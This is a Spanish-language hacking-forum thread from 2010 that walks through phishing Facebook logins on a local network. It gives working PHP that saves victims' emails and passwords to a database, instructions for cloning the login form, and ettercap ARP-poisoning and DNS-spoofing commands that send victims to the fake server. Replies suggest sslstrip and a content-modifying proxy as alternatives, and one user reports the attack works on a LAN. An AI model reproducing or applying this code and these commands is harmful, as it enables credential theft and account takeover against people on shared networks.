fakeFacebook

Iniciado por dazoverride, 20 Diciembre 2010, 04:46 AM

0 Miembros y 3 Visitantes están viendo este tema.

dazoverride

Vamos a crear un servidor LAMP, y falsear facebook (mientras la victima piensa que entra en facebook, en realidad entra en nuestro servidor apache) para que al ingresar las contraseñas queden grabadas en nuestra base de datos, tambien deberemos hacer un dns_spoof a la victima...

Sirve para cualquier web cambiando un par de parametros pero el ejemplo lo he hecho con facebook

1- Instalamos la base de datos:
sudo aptitude install php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin

2- Descargamos el phpMyAdmin lo descomprimimos y lo metemos en /var/www/

3- Configuramos la base de datos y creamos una base de datos llamada XXX con una tabla Passwords con tres campos que seran id, user, pass

Bien ya tenemos la base de datos configurada, ahora un poco de php.

4- Copiamos el index de facebook y lo metemos en nuestro servidor web,  /var/www/index.php
En este archivo debemos cambiar el action del <form id="login_form">
Citar
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="NLumB" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />.................

debemos poner este php como action dejando igual todo lo demas--> form method="POST" action="insert_into.php"

5-ponemos este insert_into.php en /var/www/
Citar
<?php
$conn=mysql_connect("127.0.0.1","userBaseDeDatos","passBaseDeDatos");
$err_db=mysql_select_db("XXX");

$usuario=$_POST['email'];
$contra=$_POST['pass'];

$sql="insert into Passwords (user, pass) values ('$usuario', '$contra')";
if ( ! $resul=mysql_query($sql,$conn))
{
   exit;
}
mysql_close();
//header ("Location: https://login.facebook.com/login.php?login_attempt=1");
?>

<html><head></head><body>
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" name="lsd" value="LzdnF" autocomplete="off">
   <input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off">
   <?php
      echo '<input type="hidden" class="inputtext" name="email" id="email" tabindex="1" value='.$usuario.'>';
      echo '<input type="hidden" class="inputtext" name="pass" id="pass" tabindex="2" value='.$contra.'>';
   ?>
   <!--<input value="Entrar" tabindex="4" type="submit">  -->
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" id="lsd" name="lsd" value="LzdnF" autocomplete="off">
   <script language="javascript" type="text/javascript">
      <!--
         document.getElementById('login_form').submit();
      //-->
   </script>
</form>
</body></html>

Bueno, por fin lo tenemos todo preparado, solo nos falta la ayuda de ettercap.

6-Configuramos el /usr/share/ettercap/etter.dns y ejecutamos ettercap
Citarsudo echo *.facebook.*      A    TuIP > /usr/share/ettercap/etter.dns
sudo echo www.facebook.*      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.com      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.es      A    TuIP >> /usr/share/ettercap/etter.dns
sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof // /ipRouter/

Bueno... vaya sermón he soltado.... Espero que sirva para aprender y disculpad que no me explique muy bien :S

SALUDOS!!!!
Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...

dvdr

#1
yo soy un poco torpe bueno bastante torpe ....esto lo puedes poner con imagenes de cada paso y aparte como lanzarlo

en el 2 paso ya me perdi porque lo e cojido de synaptyc ...¡¡¡talvez no lo deberia aver cojido de hay
salu2


nose cual es el apropiado http://www.phpmyadmin.net/home_page/downloads.php
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

fujiyaro

Esta bien y muy currado, pero a mi parecer es más fácil hacerlo sin necesidad de montar un servidor i acer un dns_spoof.
Con el mismo ettercap y sslstrip puedes montar un arp_poisoning y para tu fin te dara el mismo resultado, pero más fácil y commutable con todas las web.

PD: me gusto tu sistema.

dvdr

si funciona pero porlo visto dicen que tiene un faenon explicarlo paso a paso

lee pedido al aguien que lo haga y me a dicho eso ...asi que si alguien se anima se lo agradeceria salu2
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

dazoverride

#4
Cita de: fujiyaro en 23 Diciembre 2010, 02:00 AM
Esta bien y muy currado, pero a mi parecer es más fácil hacerlo sin necesidad de montar un servidor i acer un dns_spoof.
Con el mismo ettercap y sslstrip puedes montar un arp_poisoning y para tu fin te dara el mismo resultado, pero más fácil y commutable con todas las web.

PD: me gusto tu sistema.
Gracias :D  :P
Haber si, está claro que con un simple ettercap + sslstrip seria más fácil y mas rápido, pero el camino difícil es más divertido, y no se... ademas fue una idea que se me ocurrió y pues ahora que tengo un nivel de programacion mas alto pues me dió por hacerlo y ya que no he aportado nada mas que tonterias por aquí pos me apetecia subir algo decente...

No se, quiza no me he explicado muy bien, pero vamos, que está el codigo del index.php y el insert_into.php que creo que es lo mas "difícil", la verdad.


Cita de: dvdr en 20 Diciembre 2010, 11:19 AM
yo soy un poco torpe bueno bastante torpe ....esto lo puedes poner con imagenes de cada paso y aparte como lanzarlo

en el 2 paso ya me perdi porque lo e cojido de synaptyc ...¡¡¡talvez no lo deberia aver cojido de hay
salu2


nose cual es el apropiado http://www.phpmyadmin.net/home_page/downloads.php
ufff... que dolor a la vista, porfavor... es el primer enlace que te da google si pones phpMyAdmin!!!!!!! y si no sabes cual poner buscalo en google... ademas he puesto como se instala el LAMP y todo, no se la verdad esque me esperaba cualquier pregunta menos esa.... Esque me siento ofendido enserio... XD

Mirad he publicado esto para que podamos aprender todos, no para sacar passwords de facebook, el fallo es mio por llamarlo asi.....

Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...

dazoverride

Por cierto haber si alguien me soluciona el problema :P tiene un pequeño fallito el procedimiento :P

La questión es... hago el dns_spoof para que vaya a mi servidor en vez de a facebook real, con la copia de facebook o lo que sea, pero al hacer el dns_spoof, la víctima se queda en mi servidor y no puedo redirigirlo al facebook real :P ya que se me queda spoofeado en mi servidor y de ahí no sale jajaj vamos que una vez spoofeado no me deja ir a facebook. Alguna solución? A mi lo único que se me ocurre es reenviarlo a un html con un mensaje de error y avan.... pero ya pierde la gracia porque no te redirije al facebook logueado...
Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...

sclub

Ui!!! Daz por aquí!!! Cualquiera diria que te conozco.... xD

Pues a mi se me ocurren dos formas, una seria modificando el etter.dns al vuelo y volver a lanzarlo desde el archivo php una vez ya tienes los datos en tus variables. Y la otra, seria utilizando una aplicación que encontré el otro dia entre mis favoritos(xD), beefyproxy. No la he probado aun, pero la explicación es bastante clara:
CitarBeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF.
(Esta app salió de un user del foro... pero no recuerdo quien fue... ;))

Nada pues, suerte con eso y ya me contaras! :laugh:
... because making UNIX friendly is easier than debugging Windows.

dazoverride

#7
Cita de: sclub en 24 Diciembre 2010, 16:56 PM
Ui!!! Daz por aquí!!! Cualquiera diria que te conozco.... xD

Pues a mi se me ocurren dos formas, una seria modificando el etter.dns al vuelo y volver a lanzarlo desde el archivo php una vez ya tienes los datos en tus variables. Y la otra, seria utilizando una aplicación que encontré el otro dia entre mis favoritos(xD), beefyproxy. No la he probado aun, pero la explicación es bastante clara:(Esta app salió de un user del foro... pero no recuerdo quien fue... ;))

Nada pues, suerte con eso y ya me contaras! :laugh:

jajajaj!!! vale... pos entonces me lo explicas en clase? jajajajaj

No enserio buena idea aora mismo lo pruebo

aiva!! lo acabo de mirar y.... muy buena info :P aqui esta el post completo
http://foro.elhacker.net/analisis_y_diseno_de_malware/beefyproxy_mitm_web_con_modificacion_de_contenido-t252828.0.html
Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...

dvdr

Citarufff... que dolor a la vista, porfavor... es el primer enlace que te da google si pones phpMyAdmin!!!!!!! y si no sabes cual poner buscalo en google... ademas he puesto como se instala el LAMP y todo, no se la verdad esque me esperaba cualquier pregunta menos esa.... Esque me siento ofendido enserio... XD


la verdad no se aque viene tu mosqueo porque lo busque en google y medio ese y 300mil mas
pero en fin gracias a tu aporte estoy estudiando  html y php  salu2


                                        y  funciona, pero solo en lan

cita:algunas pernonas nesesitamos que nos expliquen las cosas como a los niños  chicos  ;-)
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

177600531

Cita de: dvdr en 25 Diciembre 2010, 13:13 PM

la verdad no se aque viene tu mosqueo porque lo busque en google y medio ese y 300mil mas
pero en fin gracias a tu aporte estoy estudiando  html y php  salu2


                                        y  funciona, pero solo en lan

cita:algunas pernonas nesesitamos que nos expliquen las cosas como a los niños  chicos  ;-)

Pues ya te vale, si no entiendes una cosa tan básica como esa además de que te lo dan masticado en el plato, el problema es que hay mucha información con video Tutoriales y muchas fotos y luego cuando os ponen un tutorial sin fotos ya estáis todos llorando.